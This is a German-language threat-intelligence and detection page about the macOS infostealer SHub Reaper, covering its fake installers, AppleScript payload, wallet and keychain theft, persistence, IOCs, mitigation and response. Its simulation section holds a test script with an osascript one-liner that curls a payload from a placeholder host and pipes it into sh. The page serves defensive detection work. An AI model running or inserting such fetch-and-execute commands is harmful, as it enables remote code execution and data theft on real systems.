SOC Prime Bias: Mittel

20 May 2026 22:15 UTC

SHub Reaper | macOS Stealer täuscht Apple, Google und Microsoft in einer einzigen Angriffskette

Author Photo
SOC Prime Team linkedin icon Folgen
SHub Reaper | macOS Stealer täuscht Apple, Google und Microsoft in einer einzigen Angriffskette
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht analysiert eine neue macOS-Infostealer-Variante namens SHub Reaper, die gefälschte WeChat- und Miro-Installer verwendet, um eine bösartige AppleScript-Nutzlast über eine typovergleichene, Microsoft-ähnliche Domain bereitzustellen. Nach dem Start im Skripteditor sammelt die Nutzlast Browserdaten, Kryptowährungs-Wallet-Dateien und Schlüsselbundinformationen und exfiltriert dann die gestohlenen Inhalte als geteilte ZIP-Archive. Die Malware manipuliert auch Wallet-Dateien und etabliert Persistenz über einen LaunchAgent, der als Google-Software-Update getarnt ist. Empfohlene Erkennung konzentriert sich auf AppleScript-Ausführung, verdächtige LaunchAgent-Erstellung und ausgehenden Datenverkehr zur bekannten Command-and-Control-Infrastruktur.

Untersuchung

SentinelOne verfolgte die komplette mehrstufige Lieferkette einschließlich Missbrauch des applescript:// -Schemas, dynamische Generierung der AppleScript-Nutzlast und eines Dateierfassungsmoduls, das das Dokumentendiebstahlverhalten, das in AMOS zu sehen ist, spiegelt. Forscher fingen den Netzwerkverkehr zur Command-and-Control-Domain hebsbsbzjsjshduxbs.xyz und zugehörigen Endpunkten ab, zusammen mit der Erstellung temporärer Dateien unter /tmp und eines LaunchAgents, der im Benutzerverzeichnis der Bibliothek platziert wurde. Die Untersuchung entdeckte zudem fest codierte Telegram-Bot-Funktionalität, die für die Betreiber-Telemetrie verwendet wird.

Minderung

Verteidiger sollten den Zugriff auf die typoverschwundenen Domains blockieren mlcrosoft.co.com, qq-0732gwh22.com, und mlroweb.com, und die Erstellung von LaunchAgents überwachen, die Pfade imitieren, die Google-Update-Komponenten nachahmen. Anwendungserlaubnislisten sollten verwendet werden, um die AppleScript-Ausführung aus nicht vertrauenswürdigen Quellen zu beschränken, und strenge Codesignaturverifikation sollte erzwungen werden. Netzwerkerkennungen sollten auch auf Kommunikation mit der identifizierten Command-and-Control-Domain und deren bekannten API-Pfaden aufmerksam machen.

Reaktion

Sollte SHub Reaper Aktivität entdeckt werden, isolieren Sie den betroffenen Endpunkt umgehend, beenden Sie alle verdächtigen AppleScript- oder LaunchAgent-Prozesse und entfernen Sie die bösartigen Dateien aus /tmp und der Benutzerbibliothek. Ermittler sollten dann eine vollständige forensische Sammlung von Browserdatenspeichern, Wallet-Verzeichnissen und Anmeldeinformationen durchführen, gefolgt von Anmeldeinformations-Rücksetzungen, wo ein Kompromiss vermutet wird. Die identifizierte Command-and-Control-Infrastruktur sollte blockiert werden, und das Incident-Response-Team sollte mit einer umfassenderen Bedrohungsjagd in der gesamten Umgebung beginnen.

Angriffsfluss

Simulationsausführung

Voraussetzung: Die Telemetrie & Baseline-Vorflugprüfung muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und dazu dienen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angreifernarrativ & Befehle:
    Der Angreifer erstellt einen prägnanten Einzeiler, der osascript nutzt, um einen Shell-Befehl auszuführen. Innerhalb des AppleScripts, do shell script führt curl aus, um ein Remote-Shell-Skript (payload.sh) herunterzuladen und direkt in sh zur Ausführung zu leiten. Da die gesamte Kette in einem einzigen AppleScript-Aufruf eingebettet ist, protokolliert macOS ein einzelnes Prozesserstellung Ereignis, dessen Befehlszeile sowohl enthält osascript and curl, was die Erkennungsregel erfüllt.

  • Regressionstestskript:

    #!/bin/bash
    #
    # Simuliert die Ausführung von SHub Reaper auf macOS
    # Generiert ein einzelnes Prozesserstellungs-Ereignis, das sowohl 'osascript' als auch 'curl' enthält
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # Einzeiler: osascript führt einen Shell-Befehl aus, der die Nutzlast holt und ausführt
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • Bereinigungskommandos:

    #!/bin/bash
    #
    # Bereinigen Sie alle von der Simulation erstellten Artefakte.
    # Die Nutzlast läuft im Speicher und schreibt keine Dateien, aber wir stellen sicher, dass keine verbleibenden Prozesse bleiben.
    #
    # Töten Sie alle Streu-'sh'-Prozesse, die durch den Test gestartet wurden (mit Vorsicht auf Produktionssystemen verwenden)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"